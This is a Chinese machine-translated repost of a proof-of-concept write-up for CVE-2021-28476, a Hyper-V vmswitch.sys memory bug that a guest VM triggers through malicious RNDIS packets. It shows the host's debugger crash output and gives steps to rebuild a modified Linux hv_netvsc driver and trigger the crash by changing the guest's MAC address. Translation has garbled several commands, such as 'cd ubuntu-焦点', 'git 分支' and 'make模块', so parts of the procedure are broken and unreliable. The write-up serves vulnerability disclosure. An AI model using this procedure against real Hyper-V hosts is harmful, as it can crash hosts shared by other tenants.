前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2021-28476 Hyper-V 远程代码执行漏洞

CVE-2021-28476 Hyper-V 远程代码执行漏洞

作者头像
Khan安全团队
发布2021-07-08 11:38:30
1.2K0
发布2021-07-08 11:38:30
举报
文章被收录于专栏:Khan安全团队Khan安全团队

这是CVE-2021-28476(“Hyper-V 远程代码执行漏洞”)的概念证明,这是vmswitch.sys微软在 2021 年 4 月修补的任意内存读取(网络虚拟化服务提供商)。

它可由访客虚拟机通过VMBus(这是一种用于分区间通信的基于通道的通信机制)发送恶意 RNDIS 数据包触发。

这是主机系统崩溃在调试器中的样子:

代码语言:javascript
复制
*** Fatal System Error: 0x0000007e
                       (0xFFFFFFFFC0000005,0xFFFFF80AD4A41A63,0xFFFFB70DD7EB7028,0xFFFFB70DD7EB6860)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff801`31412c50 cc              int     3

kd> .cxr 0xffffb70dd7eb6860
rax=fffff80ad4bc7214 rbx=fffff80ad4bf62a0 rcx=0000000000000000
rdx=00000000047a2807 rsi=ffffb70dd7eb7420 rdi=ffffa58caa318f00
rip=fffff80ad4a41a63 rsp=ffffb70dd7eb7260 rbp=ffffa58caa318fe0
 r8=0000000000000000  r9=000000000000013b r10=deadbeefbaadc0be
r11=ffffb70dd7eb7230 r12=fffff80ad4bc73d0 r13=00000000c0000001
r14=00000000000021f0 r15=fffff80ad4bc7360
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
vmswitch!VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST+0xfb:
fffff80a`d4a41a63 418b4a20        mov     ecx,dword ptr [r10+20h] ds:002b:deadbeef`baadc0de=????????

kd> kp
 # Child-SP          RetAddr               Call Site
00 ffffb70d`d7eb7260 fffff80a`d4a3ee41     vmswitch!VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST+0xfb
01 ffffb70d`d7eb7300 fffff80a`d4a3fc76     vmswitch!VmsIfrInfoParamsNdisOidRequestBuffer+0x14d
02 ffffb70d`d7eb7380 fffff80a`d4a3c779     vmswitch!RndisDevHostHandleSetMessage+0x196
03 ffffb70d`d7eb7420 fffff801`3136f423     vmswitch!RndisDevHostControlMessageWorkerRoutine+0x199
04 ffffb70d`d7eb74c0 fffff801`3123a975     nt!IopProcessWorkItem+0x93
05 ffffb70d`d7eb7530 fffff801`3132ce85     nt!ExpWorkerThread+0x105
06 ffffb70d`d7eb75d0 fffff801`31412408     nt!PspSystemThreadStartup+0x55
07 ffffb70d`d7eb7620 00000000`00000000     nt!KiStartSystemThread+0x28

该错误本身发生在VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST一个函数中,该函数可以使用攻击者控制的数据(它不应该)调用,并取消引用boom->_win恶意来宾虚拟机可以提供的指针(如下)两次。

运行 PoC 的最简单方法是创建一个运行最新Ubuntu Focal的 Linux 虚拟机。

完成后,克隆匹配的内核源:

代码语言:javascript
复制
$ uname -a
Linux Tourdeforce 5.4.0-73-generic # 82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
$ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-focal.git
$ cd ubuntu-焦点
$ git checkout Ubuntu-5.4.0-73.82
$ git 分支 fbl_vswitch
$ git checkout fbl_vswitch

更换~/ubuntu-focal/drivers/net/hyperv/netvsc_drv.c用的src / netvsc_drv.c,~/ubuntu-focal/drivers/net/hyperv/rndis_filter.c由SRC / rndis_filter.c和~/ubuntu-focal/drivers/net/hyperv/hyperv_net.h由SRC / hyperv_net.h(可用全DIFF CVE-2021-28476.diff):

代码语言:javascript
复制
$ sudo apt-get install git build-essential kernel-package fakeroot libncurses5-dev libssl-dev ccache bison flex libelf-dev dwarves
$ cp /boot/config-5.4.0-73-generic .config
$ make oldconfig
$ make模块
$ make M=drivers/net/hyperv

最后,通过加载模块并更改网络接口的以太网地址来触发问题(此操作会触发我们在rndis_filter.c / 中添加的特定代码路径netvsc_set_mac_addr):

代码语言:javascript
复制
$ sudo rmmod hv_netvsc && insmod 驱动程序/net/hyperv/hv_netvsc.ko
$ sudo ifconfig eth0 hw ether 00:11:22:33:44
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-06-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档